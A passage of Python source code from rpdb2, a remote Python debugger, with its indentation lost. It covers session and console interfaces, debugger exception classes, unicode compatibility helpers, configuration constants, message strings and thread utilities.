defined below, for example STATE_DETACHED, STATE_BROKEN, etc...
"""
return self.__smi.get_state()
#
# REVIEW: Improve data strucutre.
#
def get_thread_list(self):
return self.__smi.get_thread_list()
def set_thread(self, tid):
"""
Set the focused thread to the soecified thread.
tid - either the OS thread id or the zero based index of the thread
in the thread list returned by get_thread_list().
"""
return self.__smi.set_thread(tid)
def set_password(self, _rpdb2_pwd):
"""
Set the password that will govern the authentication and encryption
of client-server communication.
"""
_rpdb2_pwd = as_unicode(_rpdb2_pwd, fstrict = True)
return self.__smi.set_password(_rpdb2_pwd)
def get_password(self):
"""
Get the password that governs the authentication and encryption
of client-server communication.
"""
return self.__smi.get_password()
def get_encryption(self):
"""
Get the encryption mode. Return True if unencrypted connections are
not allowed. When launching a new debuggee the debuggee will inherit
the encryption mode. The encryption mode can be set via command-line
only.
"""
return self.__smi.get_encryption()
def set_remote(self, fAllowRemote):
"""
Set the remote-connections mode. if True, connections from remote
machine are allowed. When launching a new debuggee the debuggee will
inherit this mode. This mode is only relevant to the debuggee.
"""
return self.__smi.set_remote(fAllowRemote)
def get_remote(self):
"""
Get the remote-connections mode. Return True if connections from
remote machine are allowed. When launching a new debuggee the
debuggee will inherit this mode. This mode is only relevant to the
debuggee.
"""
return self.__smi.get_remote()
def set_environ(self, envmap):
"""
Set the environment variables mapping. This mapping is used
when a new script is launched to modify its environment.
Example for a mapping on Windows: [('Path', '%Path%;c:\\mydir')]
Example for a mapping on Linux: [('PATH', '$PATH:~/mydir')]
The mapping should be a list of tupples where each tupple is
composed of a key and a value. Keys and Values must be either
strings or Unicode strings. Other types will raise the BadArgument
exception.
Invalid arguments will be silently ignored.
"""
return self.__smi.set_environ(envmap)
def get_environ(self):
"""
Return the current environment mapping.
"""
return self.__smi.get_environ()
def stop_debuggee(self):
"""
Stop the debuggee immediately.
"""
return self.__smi.stop_debuggee()
class CConsole:
"""
Interface to a debugger console.
"""
def __init__(
self,
session_manager,
stdin = None,
stdout = None,
fSplit = False
):
"""
Constructor of CConsole
session_manager - session manager object.
stdin, stdout - redirection for IO.
fsplit - Set flag to True when Input and Ouput belong to different
panes. For example take a look at Winpdb.
"""
self.m_ci = CConsoleInternal(
session_manager,
stdin,
stdout,
fSplit
)
def start(self):
return self.m_ci.start()
def join(self):
"""
Wait until the console ends.
"""
return self.m_ci.join()
def set_filename(self, filename):
"""
Set current filename for the console. The current filename can change
from outside the console when the console is embeded in other
components, for example take a look at Winpdb.
"""
filename = as_unicode(filename)
return self.m_ci.set_filename(filename)
def complete(self, text, state):
"""
Return the next possible completion for 'text'.
If a command has not been entered, then complete against command list.
Otherwise try to call complete_<command> to get list of completions.
"""
text = as_unicode(text)
return self.m_ci.complete(text, state)
def printer(self, text):
text = as_unicode(text)
return self.m_ci.printer(text)
#
# ---------------------------- Exceptions ----------------------------------
#
class CException(Exception):
"""
Base exception class for the debugger.
"""
def __init__(self, *args):
Exception.__init__(self, *args)
class BadMBCSPath(CException):
"""
Raised on Windows systems when the python executable or debugger script
path can not be encoded with the file system code page. This means that
the Windows code page is misconfigured.
"""
class NotPythonSource(CException):
"""
Raised when an attempt to load non Python source is made.
"""
class InvalidScopeName(CException):
"""
Invalid scope name.
This exception might be thrown when a request was made to set a breakpoint
to an unknown scope.
"""
class BadArgument(CException):
"""
Bad Argument.
"""
class ThreadNotFound(CException):
"""
Thread not found.
"""
class NoThreads(CException):
"""
No Threads.
"""
class ThreadDone(CException):
"""
Thread Done.
"""
class DebuggerNotBroken(CException):
"""
Debugger is not broken.
This exception is thrown when an operation that can only be performed
while the debuggee is broken, is requested while the debuggee is running.
"""
class InvalidFrame(CException):
"""
Invalid Frame.
This exception is raised if an operation is requested on a stack frame
that does not exist.
"""
class NoExceptionFound(CException):
"""
No Exception Found.
This exception is raised when exception information is requested, but no
exception is found, or has been thrown.
"""
class CConnectionException(CException):
def __init__(self, *args):
CException.__init__(self, *args)
class FirewallBlock(CConnectionException):
"""Firewall is blocking socket communication."""
class BadVersion(CConnectionException):
"""Bad Version."""
def __init__(self, version):
CConnectionException.__init__(self)
self.m_version = version
def __str__(self):
return repr(self.m_version)
class UnexpectedData(CConnectionException):
"""Unexpected data."""
class AlreadyAttached(CConnectionException):
"""Already Attached."""
class NotAttached(CConnectionException):
"""Not Attached."""
class SpawnUnsupported(CConnectionException):
"""Spawn Unsupported."""
class UnknownServer(CConnectionException):
"""Unknown Server."""
class CSecurityException(CConnectionException):
def __init__(self, *args):
CConnectionException.__init__(self, *args)
class UnsetPassword(CSecurityException):
"""Unset Password."""
class EncryptionNotSupported(CSecurityException):
"""Encryption Not Supported."""
class EncryptionExpected(CSecurityException):
"""Encryption Expected."""
class DecryptionFailure(CSecurityException):
"""Decryption Failure."""
class AuthenticationBadData(CSecurityException):
"""Authentication Bad Data."""
class AuthenticationFailure(CSecurityException):
"""Authentication Failure."""
class AuthenticationBadIndex(CSecurityException):
"""Authentication Bad Index."""
def __init__(self, max_index = 0, anchor = 0):
CSecurityException.__init__(self)
self.m_max_index = max_index
self.m_anchor = anchor
def __str__(self):
return repr((self.m_max_index, self.m_anchor))
#
#----------------- unicode handling for compatibility with py3k ----------------
#
def is_py3k():
return sys.version_info[0] >= 3
def is_unicode(s):
if is_py3k() and type(s) == str:
return True
if type(s) == unicode:
return True
return False
def as_unicode(s, encoding = 'utf-8', fstrict = False):
if is_unicode(s):
return s
if fstrict:
u = s.decode(encoding)
else:
u = s.decode(encoding, 'replace')
return u
def as_string(s, encoding = 'utf-8', fstrict = False):
if is_py3k():
if is_unicode(s):
return s
if fstrict:
e = s.decode(encoding)
else:
e = s.decode(encoding, 'replace')
return e
if not is_unicode(s):
return s
if fstrict:
e = s.encode(encoding)
else:
e = s.encode(encoding, 'replace')
return e
def as_bytes(s, encoding = 'utf-8', fstrict = True):
if not is_unicode(s):
return s
if fstrict:
b = s.encode(encoding)
else:
b = s.encode(encoding, 'replace')
return b
#
#----------------------- Infinite List of Globals ---------------------------
#
#
# According to PEP-8: "Use 4 spaces per indentation level."
#
PYTHON_TAB_WIDTH = 4
GNOME_DEFAULT_TERM = 'gnome-terminal'
NT_DEBUG = 'nt_debug'
SCREEN = 'screen'
MAC = 'mac'
DARWIN = 'darwin'
POSIX = 'posix'
#
# Map between OS type and relevant command to initiate a new OS console.
# entries for other OSs can be added here.
# '%s' serves as a place holder.
#
# Currently there is no difference between 'nt' and NT_DEBUG, since now
# both of them leave the terminal open after termination of debuggee to
# accommodate scenarios of scripts with child processes.
#
osSpawn = {
'nt': 'start "rpdb2 - Version ' + get_version() + ' - Debuggee Console" cmd.exe /K ""%(exec)s" %(options)s"',
NT_DEBUG: 'start "rpdb2 - Version ' + get_version() + ' - Debuggee Console" cmd.exe /K ""%(exec)s" %(options)s"',
POSIX: "%(term)s -e %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
'Terminal': "Terminal --disable-server -x %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
GNOME_DEFAULT_TERM: "gnome-terminal --disable-factory -x %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
MAC: '%(exec)s %(options)s',
DARWIN: '%(exec)s %(options)s',
SCREEN: 'screen -t debuggee_console %(exec)s %(options)s'
}
RPDBTERM = 'RPDBTERM'
COLORTERM = 'COLORTERM'
TERM = 'TERM'
KDE_PREFIX = 'KDE'
GNOME_PREFIX = 'GNOME'
KDE_DEFAULT_TERM_QUERY = "kreadconfig --file kdeglobals --group General --key TerminalApplication --default konsole"
XTERM = 'xterm'
RXVT = 'rxvt'
RPDB_SETTINGS_FOLDER = '.rpdb2_settings'
RPDB_PWD_FOLDER = os.path.join(RPDB_SETTINGS_FOLDER, 'passwords')
RPDB_BPL_FOLDER = os.path.join(RPDB_SETTINGS_FOLDER, 'breakpoints')
RPDB_BPL_FOLDER_NT = 'rpdb2_breakpoints'
MAX_BPL_FILES = 100
EMBEDDED_SYNC_THRESHOLD = 1.0
EMBEDDED_SYNC_TIMEOUT = 5.0
HEARTBEAT_TIMEOUT = 16
IDLE_MAX_RATE = 2.0
PING_TIMEOUT = 4.0
LOCAL_TIMEOUT = 1.0
COMMUNICATION_RETRIES = 5
WAIT_FOR_BREAK_TIMEOUT = 3.0
SHUTDOWN_TIMEOUT = 4.0
STARTUP_TIMEOUT = 3.0
STARTUP_RETRIES = 3
LOOPBACK = '127.0.0.1'
LOCALHOST = 'localhost'
SERVER_PORT_RANGE_START = 51000
SERVER_PORT_RANGE_LENGTH = 24
SOURCE_EVENT_CALL = 'C'
SOURCE_EVENT_LINE = 'L'
SOURCE_EVENT_RETURN = 'R'
SOURCE_EVENT_EXCEPTION = 'E'
SOURCE_STATE_UNBROKEN = '*'
SOURCE_BP_ENABLED = 'B'
SOURCE_BP_DISABLED = 'D'
SYMBOL_MARKER = '>'
SYMBOL_ALL = '*'
SOURCE_MORE = '+'
SOURCE_LESS = '-'
SOURCE_ENTIRE_FILE = '^'
CONSOLE_PRINTER = '*** '
CONSOLE_WRAP_INDEX = 78
CONSOLE_PROMPT = '\n> '
CONSOLE_PROMPT_ANALYZE = '\nAnalayze> '
CONSOLE_INTRO = ("""RPDB2 - The Remote Python Debugger, version %s,
Copyright (C) 2005-2009 Nir Aides.
Type "help", "copyright", "license", "credits" for more information.""" % (RPDB_VERSION))
PRINT_NOTICE_PROMPT = "Hit Return for more, or q (and Return) to quit:"
PRINT_NOTICE_LINES_PER_SECTION = 20
STR_NO_THREADS = "Operation failed since no traced threads were found."
STR_STARTUP_NOTICE = "Attaching to debuggee..."
STR_SPAWN_UNSUPPORTED = "The debugger does not know how to open a new console on this system. You can start the debuggee manually with the -d flag on a separate console and then use the 'attach' command to attach to it."
STR_SPAWN_UNSUPPORTED_SCREEN_SUFFIX = """Alternatively, you can use the screen utility and invoke rpdb2 in screen mode with the -s command-line flag as follows:
screen rpdb2 -s some-script.py script-arg1 script-arg2..."""
STR_AUTOMATIC_LAUNCH_UNKNOWN = STR_SPAWN_UNSUPPORTED
STR_STARTUP_SPAWN_NOTICE = "Starting debuggee..."
STR_KILL_NOTICE = "Stopping debuggee..."
STR_STARTUP_FAILURE = "Debuggee failed to start in a timely manner."
STR_OUTPUT_WARNING = "Textual output will be done at the debuggee."
STR_OUTPUT_WARNING_ASYNC = "The operation will continue to run in the background."
STR_ANALYZE_GLOBALS_WARNING = "In analyze mode the globals and locals dictionaries are read only."
STR_BREAKPOINTS_LOADED = "Breakpoints were loaded."
STR_BREAKPOINTS_SAVED = "Breakpoints were saved."
STR_BREAKPOINTS_SAVE_PROBLEM = "A problem occurred while saving the breakpoints."
STR_BREAKPOINTS_LOAD_PROBLEM = "A problem occurred while loading the breakpoints."
STR_BREAKPOINTS_NOT_SAVED = "Breakpoints were not saved."
STR_BREAKPOINTS_NOT_LOADED = "Breakpoints were not loaded."
STR_BREAKPOINTS_FILE_NOT_FOUND = "Breakpoints file was not found."
STR_BREAKPOINTS_NOT_FOUND = "No Breakpoints were found."
STR_BAD_FILENAME = "Bad File Name."
STR_SOME_BREAKPOINTS_NOT_LOADED = "Some breakpoints were not loaded, because of an error."
STR_BAD_EXPRESSION = "Bad expression '%s'."
STR_FILE_NOT_FOUND = "File '%s' not found."
STR_DISPLAY_ERROR = """If the X server (Windowing system) is not started you need to use rpdb2 with the screen utility and invoke rpdb2 in screen mode with the -s command-line flag as follows:
screen rpdb2 -s some-script.py script-arg1 script-arg2..."""
STR_EXCEPTION_NOT_FOUND = "No exception was found."
STR_SCOPE_NOT_FOUND = "Scope '%s' not found."
STR_NO_SUCH_BREAKPOINT = "Breakpoint not found."
STR_THREAD_NOT_FOUND = "Thread was not found."
STR_NO_THREADS_FOUND = "No threads were found."
STR_THREAD_NOT_BROKEN = "Thread is running."
STR_THREAD_FOCUS_SET = "Focus was set to chosen thread."
STR_ILEGAL_ANALYZE_MODE_ARG = "Argument is not allowed in analyze mode. Type 'help analyze' for more info."
STR_ILEGAL_ANALYZE_MODE_CMD = "Command is not allowed in analyze mode. Type 'help analyze' for more info."
STR_ANALYZE_MODE_TOGGLE = "Analyze mode was set to: %s."
STR_BAD_ARGUMENT = "Bad Argument."
STR_BAD_SYNTAX = 'Unknown syntax: %s\nDid you forget to use the exec or eval console commands?'
STR_PSYCO_WARNING = "The psyco module was detected. The debugger is incompatible with the psyco module and will not function correctly as long as the psyco module is imported and used."
STR_CONFLICTING_MODULES = "The modules: %s, which are incompatible with the debugger were detected and can possibly cause the debugger to fail."
STR_SIGNAL_INTERCEPT = "The signal %s(%d) was intercepted inside debugger tracing logic. It will be held pending until the debugger continues. Any exceptions raised by the handler will be ignored!"
STR_SIGNAL_EXCEPTION = "Exception %s raised by handler of signal %s(%d) inside debugger tracing logic was ignored!"
STR_DEBUGGEE_TERMINATED = "Debuggee has terminated."
STR_DEBUGGEE_NOT_BROKEN = "Debuggee has to be waiting at break point to complete this command."
STR_DEBUGGER_HAS_BROKEN = "Debuggee is waiting at break point for further commands."
STR_ALREADY_ATTACHED = "Already attached. Detach from debuggee and try again."
STR_NOT_ATTACHED = "Not attached to any script. Attach to a script and try again."
STR_COMMUNICATION_FAILURE = "Failed to communicate with debugged script."
STR_ERROR_OTHER = "Command returned the following error:\n%(type)s, %(value)s.\nPlease check stderr for stack trace and report to support."
STR_BAD_MBCS_PATH = "The debugger can not launch the script since the path to the Python executable or the debugger scripts can not be encoded into the default system code page. Please check the settings of 'Language for non-Unicode programs' in the Advanced tab of the Windows Regional and Language Options dialog."
STR_LOST_CONNECTION = "Lost connection to debuggee."
STR_FIREWALL_BLOCK = "A firewall is blocking the local communication chanel (socket) that is required between the debugger and the debugged script. Please make sure that the firewall allows that communication."
STR_BAD_VERSION = "A debuggee was found with incompatible debugger version %(value)s."
STR_BAD_VERSION2 = "While attempting to find the specified debuggee at least one debuggee was found that uses incompatible version of RPDB2."
STR_UNEXPECTED_DATA = "Unexpected data received."
STR_ACCESS_DENIED = "While attempting to find debuggee, at least one debuggee denied connection because of mismatched passwords. Please verify your password."
STR_ACCESS_DENIED2 = "Communication is denied because of un-matching passwords."
STR_ENCRYPTION_EXPECTED = "While attempting to find debuggee, at least one debuggee denied connection since it accepts encrypted connections only."
STR_ENCRYPTION_EXPECTED2 = "Debuggee will only talk over an encrypted channel."
STR_DECRYPTION_FAILURE = "Bad packet was received by the debuggee."
STR_DEBUGGEE_NO_ENCRYPTION = "Debuggee does not support encrypted mode. Either install the python-crypto package on the debuggee machine or allow unencrypted connections."
STR_RANDOM_PASSWORD = "Password has been set to a random password."
STR_PASSWORD_INPUT = "Please type a password:"
STR_PASSWORD_CONFIRM = "Password has been set."
STR_PASSWORD_NOT_SUPPORTED = "The --pwd flag is only supported on NT systems."
STR_PASSWORD_MUST_BE_SET = "A password should be set to secure debugger client-server communication."
STR_BAD_DATA = "Bad data received from debuggee."
STR_BAD_FILE_DATA = "Bad data received from file."
STR_ATTACH_FAILED = "Failed to attach"
STR_ATTACH_FAILED_NAME = "Failed to attach to '%s'."
STR_ATTACH_CRYPTO_MODE = "Debug Channel is%s encrypted."
STR_ATTACH_CRYPTO_MODE_NOT = "NOT"
STR_ATTACH_SUCCEEDED = "Successfully attached to '%s'."
STR_ATTEMPTING_TO_STOP = "Requesting script to stop."
STR_ATTEMPTING_TO_DETACH = "Detaching from script..."
STR_DETACH_SUCCEEDED = "Detached from script."
STR_DEBUGGEE_UNKNOWN = "Failed to find script."
STR_MULTIPLE_DEBUGGEES = "WARNING: There is more than one debuggee '%s'."
MSG_ERROR_HOST_TEXT = """The debugger was not able to set the host to '%s'.
The following error was returned:
%s"""
STR_SOURCE_NOT_FOUND = "Failed to get source from debuggee."
STR_SCRIPTS_CONNECTING = "Connecting to '%s'..."
STR_SCRIPTS_NO_SCRIPTS = "No scripts to debug on '%s'"
STR_SCRIPTS_TO_DEBUG = """Scripts to debug on '%s':
pid name
--------------------------"""
STR_STACK_TRACE = """Stack trace for thread %d:
Frame File Name Line Function
------------------------------------------------------------------------------"""
STR_SOURCE_LINES = """Source lines for thread %d from file '%s':
"""
STR_ACTIVE_THREADS = """List of active threads known to the debugger:
No Tid Name State
-----------------------------------------------"""
STR_BREAKPOINTS_LIST = """List of breakpoints:
Id State Line Filename-Scope-Condition-Encoding
------------------------------------------------------------------------------"""
STR_BREAKPOINTS_TEMPLATE = """ %2d %-8s %5d %s
%s
%s
%s"""
STR_ENCRYPTION_SUPPORT_ERROR = "Encryption is not supported since the python-crypto package was not found. Either install the python-crypto package or allow unencrypted connections."
STR_PASSWORD_NOT_SET = 'Password is not set.'
STR_PASSWORD_SET = 'Password is set to: "%s"'
STR_PASSWORD_BAD = 'The password should begin with a letter and continue with any combination of digits, letters or underscores (\'_\'). Only English characters are accepted for letters.'
STR_ENCRYPT_MODE = 'Force encryption mode: %s'
STR_REMOTE_MODE = 'Allow remote machines mode: %s'
STR_ENCODING_MODE = 'Encoding is set to: %s'
STR_ENCODING_MODE_SET = 'Encoding was set to: %s'
STR_ENCODING_BAD = 'The specified encoding was not recognized by the debugger.'
STR_ENVIRONMENT = 'The current environment mapping is:'
STR_ENVIRONMENT_EMPTY = 'The current environment mapping is not set.'
STR_SYNCHRONICITY_BAD = "Can not process command when thread is running unless synchronicity mode is turned on. Type 'help synchro' at the command prompt for more information."
STR_SYNCHRONICITY_MODE = 'The synchronicity mode is set to: %s'
STR_TRAP_MODE = 'Trap unhandled exceptions mode is set to: %s'
STR_TRAP_MODE_SET = "Trap unhandled exceptions mode was set to: %s."
STR_FORK_MODE = "Fork mode is set to: %s, %s."
STR_FORK_MODE_SET = "Fork mode was set to: %s, %s."
STR_LOCAL_NAMESPACE_WARNING = 'Debugger modifications to the original bindings of the local namespace of this frame will be committed before the execution of the next statement of the frame. Any code using these variables executed before that point will see the original values.'
STR_WARNING = 'Warning: %s'
STR_MAX_NAMESPACE_WARNING_TITLE = 'Namespace Warning'
STR_MAX_NAMESPACE_WARNING_TYPE = '*** WARNING ***'
STR_MAX_NAMESPACE_WARNING_MSG = 'Number of items exceeds capacity of namespace browser.'
STR_MAX_EVALUATE_LENGTH_WARNING = 'Output length exeeds maximum capacity.'
FORK_CHILD = 'child'
FORK_PARENT = 'parent'
FORK_MANUAL = 'manual'
FORK_AUTO = 'auto'
ENCRYPTION_ENABLED = 'encrypted'
ENCRYPTION_DISABLED = 'plain-text'
STATE_ENABLED = 'enabled'
STATE_DISABLED = 'disabled'
BREAKPOINTS_FILE_EXT = '.bpl'
PYTHON_FILE_EXTENSION = '.py'
PYTHONW_FILE_EXTENSION = '.pyw'
PYTHONW_SO_EXTENSION = '.so'
PYTHON_EXT_LIST = ['.py', '.pyw', '.pyc', '.pyd', '.pyo', '.so']
MODULE_SCOPE = '?'
MODULE_SCOPE2 = '<module>'
BLENDER_SOURCE_NOT_AVAILABLE = as_unicode('Blender script source code is not available.')
SOURCE_NOT_AVAILABLE = as_unicode('Source code is not available.')
SCOPE_SEP = '.'
BP_FILENAME_SEP = ':'
BP_EVAL_SEP = ','
DEBUGGER_FILENAME = 'rpdb2.py'
THREADING_FILENAME = 'threading.py'
STR_STATE_BROKEN = 'waiting at break point'
STATE_BROKEN = 'broken'
STATE_RUNNING = 'running'
STATE_ANALYZE = 'analyze'
STATE_DETACHED = 'detached'
STATE_DETACHING = 'detaching'
STATE_SPAWNING = 'spawning'
STATE_ATTACHING = 'attaching'
DEFAULT_NUMBER_OF_LINES = 20
DICT_KEY_TID = 'tid'
DICT_KEY_STACK = 'stack'
DICT_KEY_CODE_LIST = 'code_list'
DICT_KEY_CURRENT_TID = 'current tid'
DICT_KEY_BROKEN = 'broken'
DICT_KEY_BREAKPOINTS = 'breakpoints'
DICT_KEY_LINES = 'lines'
DICT_KEY_FILENAME = 'filename'
DICT_KEY_FIRST_LINENO = 'first_lineno'
DICT_KEY_FRAME_LINENO = 'frame_lineno'
DICT_KEY_EVENT = 'event'
DICT_KEY_EXPR = 'expr'
DICT_KEY_NAME = 'name'
DICT_KEY_REPR = 'repr'
DICT_KEY_IS_VALID = 'fvalid'
DICT_KEY_TYPE = 'type'
DICT_KEY_SUBNODES = 'subnodes'
DICT_KEY_N_SUBNODES = 'n_subnodes'
DICT_KEY_ERROR = 'error'
RPDB_EXEC_INFO = as_unicode('rpdb_exception_info')
MODE_ON = 'ON'
MODE_OFF = 'OFF'
ENCODING_UTF8_PREFIX_1 = '\xef\xbb\xbf'
ENCODING_SOURCE = '# -*- coding: %s -*-\n'
ENCODING_AUTO = as_unicode('auto')
ENCODING_RAW = as_unicode('raw')
ENCODING_RAW_I = as_unicode('__raw')
MAX_EVALUATE_LENGTH = 256 * 1024
MAX_NAMESPACE_ITEMS = 1024
MAX_SORTABLE_LENGTH = 256 * 1024
REPR_ID_LENGTH = 4096
MAX_NAMESPACE_WARNING = {
DICT_KEY_EXPR: STR_MAX_NAMESPACE_WARNING_TITLE,
DICT_KEY_NAME: STR_MAX_NAMESPACE_WARNING_TITLE,
DICT_KEY_REPR: STR_MAX_NAMESPACE_WARNING_MSG,
DICT_KEY_IS_VALID: False,
DICT_KEY_TYPE: STR_MAX_NAMESPACE_WARNING_TYPE,
DICT_KEY_N_SUBNODES: 0
}
MAX_EVENT_LIST_LENGTH = 1000
EVENT_EXCLUDE = 'exclude'
EVENT_INCLUDE = 'include'
INDEX_TABLE_SIZE = 100
DISPACHER_METHOD = 'dispatcher_method'
CONFLICTING_MODULES = ['psyco', 'pdb', 'bdb', 'doctest']
XML_DATA = """<?xml version='1.0'?>
<methodCall>
<methodName>dispatcher_method</methodName>
<params>
<param>
<value><string>%s</string></value>
</param>
</params>
</methodCall>""" % RPDB_COMPATIBILITY_VERSION
N_WORK_QUEUE_THREADS = 8
DEFAULT_PATH_SUFFIX_LENGTH = 55
ELLIPSIS_UNICODE = as_unicode('...')
ELLIPSIS_BYTES = as_bytes('...')
ERROR_NO_ATTRIBUTE = 'Error: No attribute.'
g_server_lock = threading.RLock()
g_server = None
g_debugger = None
g_fScreen = False
g_fDefaultStd = True
#
# In debug mode errors and tracebacks are printed to stdout
#
g_fDebug = False
#
# Lock for the traceback module to prevent it from interleaving
# output from different threads.
#
g_traceback_lock = threading.RLock()
g_source_provider_aux = None
g_lines_cache = {}
g_initial_cwd = []
g_error_mapping = {
socket.error: STR_COMMUNICATION_FAILURE,
CConnectionException: STR_LOST_CONNECTION,
FirewallBlock: STR_FIREWALL_BLOCK,
BadVersion: STR_BAD_VERSION,
UnexpectedData: STR_UNEXPECTED_DATA,
SpawnUnsupported: STR_SPAWN_UNSUPPORTED,
UnknownServer: STR_DEBUGGEE_UNKNOWN,
UnsetPassword: STR_PASSWORD_MUST_BE_SET,
EncryptionNotSupported: STR_DEBUGGEE_NO_ENCRYPTION,
EncryptionExpected: STR_ENCRYPTION_EXPECTED,
DecryptionFailure: STR_DECRYPTION_FAILURE,
AuthenticationBadData: STR_ACCESS_DENIED,
AuthenticationFailure: STR_ACCESS_DENIED,
BadMBCSPath: STR_BAD_MBCS_PATH,
AlreadyAttached: STR_ALREADY_ATTACHED,
NotAttached: STR_NOT_ATTACHED,
DebuggerNotBroken: STR_DEBUGGEE_NOT_BROKEN,
NoThreads: STR_NO_THREADS,
NoExceptionFound: STR_EXCEPTION_NOT_FOUND,
}
#
# These globals are related to handling the os.fork() os._exit() and exec
# pattern.
#
g_forkpid = None
g_forktid = None
g_fignorefork = False
g_exectid = None
g_execpid = None
g_fos_exit = False
#
# To hold a reference to __main__ to prevent its release if an unhandled
# exception is raised.
#
g_module_main = None
g_found_conflicting_modules = []
g_fignore_atexit = False
g_ignore_broken_pipe = 0
#
# Unicode version of path names that do not encode well witn the windows
# 'mbcs' encoding. This dict is used to work with such path names on
# windows.
#
g_found_unicode_files = {}
g_frames_path = {}
g_signal_handlers = {}
g_signals_pending = []
#g_profile = None
g_fFirewallTest = True
if is_py3k():
g_safe_base64_to = bytes.maketrans(as_bytes('/+='), as_bytes('_-#'))
g_safe_base64_from = bytes.maketrans(as_bytes('_-#'), as_bytes('/+='))
else:
g_safe_base64_to = string.maketrans(as_bytes('/+='), as_bytes('_-#'))
g_safe_base64_from = string.maketrans(as_bytes('_-#'), as_bytes('/+='))
g_alertable_waiters = {}
g_builtins_module = sys.modules.get('__builtin__', sys.modules.get('builtins'))
#
# ---------------------------- General Utils ------------------------------
#
def job_wrapper(event, foo, *args, **kwargs):
try:
#print_debug('Thread %d doing job %s' % (thread.get_ident(), foo.__name__))
foo(*args, **kwargs)
finally:
event.set()
def send_job(tid, timeout, foo, *args, **kwargs):
#
# Attempt to send job to thread tid.
# Will throw KeyError if thread tid is not available for jobs.
#
(lock, jobs) = g_alertable_waiters[tid]
event = threading.Event()
f = lambda: job_wrapper(event, foo, *args, **kwargs)
jobs.append(f)
try:
lock.acquire()
lock_notify_all(lock)
finally:
lock.release()
safe_wait(event, timeout)
def alertable_wait(lock, timeout = None):
jobs = []
tid = thread.get_ident()
g_alertable_waiters[tid] = (lock, jobs)
try:
safe_wait(lock, timeout)
while len(jobs) != 0:
job = jobs.pop(0)
try:
job()
except:
pass
if len(jobs) == 0:
time.sleep(0.1)
finally:
del g_alertable_waiters[tid]
def safe_wait(lock, timeout = None):
#
# workaround windows bug where signal handlers might raise exceptions
# even if they return normally.
#
while True:
try:
t0 = time.time()
return lock.wait(timeout)
except:
if timeout == None:
continue
timeout -= (time.time() - t0)
if timeout <= 0:
return
#
# The following code is related to the ability of the debugger
# to work both on Python 2.5 and 3.0.
#
def lock_notify_all(lock):
try:
if is_py3k():
return lock.notify_all()
except AttributeError:
pass
return lock.notifyAll()
def event_is_set(event):
try:
if is_py3k():
return event.is_set()
except AttributeError:
pass
return event.isSet()
def thread_set_daemon(thread, fdaemon):
try:
if is_py3k():
return thread.set_daemon(fdaemon)
except AttributeError:
pass
return thread.setDaemon(fdaemon)
def thread_is_alive(thread):
try:
if is_py3k():
return thread.is_alive()
except AttributeError:
pass
return thread.isAlive()
def thread_set_name(thread, name):
try:
if is_py3k():
return thread.set_name(name)
except AttributeError:
pass
return thread.setName(name)
def thread_get_name(thread):
try:
if is_py3k():
return thread.get_name()
except AttributeError:
pass
return thread.getName()
def current_thread():
try:
if is_py3k():
return threading.current_thread()
except AttributeError:
pass
return threading.currentThread()
class _stub_type:
pass
def _rpdb2_bytes(s, e):
return s.encode(e)
if not hasattr(g_builtins_module, 'unicode'):
unicode = _stub_type
if not hasattr(g_builtins_module, 'long'):
long = _stub_type
if not hasattr(g_builtins_module, 'str8'):
str8 = _stub_type
if not hasattr(g_builtins_module, 'bytearray'):
bytearray = _stub_type
if not hasattr(g_builtins_module, 'bytes'):
bytes = _stub_type
#
# Pickle on Python 2.5 should know how to handle byte strings
# that arrive from Python 3.0 over sockets.
#
g_builtins_module.bytes = _rpdb2_bytes
if is_py3k():
class sets:
Set = _stub_type
BaseSet = _stub_type
ImmutableSet = _stub_type
if sys.version_info[:2] <= (2, 3):
set = sets.Set
def _raw_input(s):
if is_py3k():
return input(s)
i = raw_input(s)
i = as_unicode(i, detect_encoding(sys.stdin), fstrict = True)
return i
def _print(s, f = sys.stdout, feol = True):
s = as_unicode(s)
encoding = detect_encoding(f)
s = as_bytes(s, encoding, fstrict = False)
s = as_string(s, encoding)
if feol:
f.write(s + '\n')
else:
f.write(s)
def detect_encoding(file):
try:
encoding = file.encoding
if encoding == None:
return detect_locale()
except:
return detect_locale()
try:
codecs.lookup(encoding)
return encoding
except:
pass
if encoding.lower().startswith('utf_8'):
return 'utf-8'
return 'ascii'
def detect_locale():
encoding = locale.getdefaultlocale()[1]
if encoding == None:
return 'ascii'
try:
codecs.lookup(encoding)
return encoding
except:
pass
if encoding.lower().startswith('utf_8'):
return 'utf-8'
return 'ascii'
def class_name(c):
s = safe_str(c)
if "'" in s:
s = s.split("'")[1]
assert(s.startswith(__name__ + '.'))
return s
def clip_filename(path, n = DEFAULT_PATH_SUFFIX_LENGTH):
suffix = calc_suffix(path, n)
if not suffix.startswith('...'):
return suffix
index = suffix.find(os.sep)
if index == -1:
return suffix
clip = '...' + suffix[index:]
return clip
def safe_str(x):
try:
return str(x)
except:
return 'N/A'
def safe_repr(x):
try:
return repr(x)
except:
return 'N/A'
def parse_type(t):
rt = safe_repr(t)
if not "'" in rt:
return rt
st = rt.split("'")[1]
return st
def repr_list(pattern, l, length, encoding, is_valid):
length = max(0, length - len(pattern) + 2)
s = ''
index = 0
try:
for i in l:
#
# Remove any trace of session password from data structures that
# go over the network.
#
if type(i) == str and i in ['_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
continue
s += repr_ltd(i, length - len(s), encoding, is_valid)
index += 1
if index < len(l) and len(s) > length:
is_valid[0] = False
if not s.endswith('...'):
s += '...'
break
if index < len(l) or (index == 1 and pattern[0] == '('):
s += ', '
except AttributeError:
is_valid[0] = False
return as_unicode(pattern % s)
def repr_dict(pattern, d, length, encoding, is_valid):
length = max(0, length - len(pattern) + 2)
s = ''
index = 0
try:
for k in d:
#
# Remove any trace of session password from data structures that
# go over the network.
#
if type(k) == str and k in ['_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
continue
v = d[k]
s += repr_ltd(k, length - len(s), encoding, is_valid)
if len(s) > length:
is_valid[0] = False
if not s.endswith('...'):
s += '...'
break
s += ': ' + repr_ltd(v, length - len(s), encoding, is_valid)
index += 1
if index < len(d) and len(s) > length:
is_valid[0] = False
if not s.endswith('...'):
s += '...'
break
if index < len(d):
s += ', '
except AttributeError:
is_valid[0] = False
return as_unicode(pattern % s)
def repr_bytearray(s, length, encoding, is_valid):
try:
s = s.decode(encoding)
r = repr_unicode(s, length, is_valid)
return 'bytearray(b' + r[1:] + ')'
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
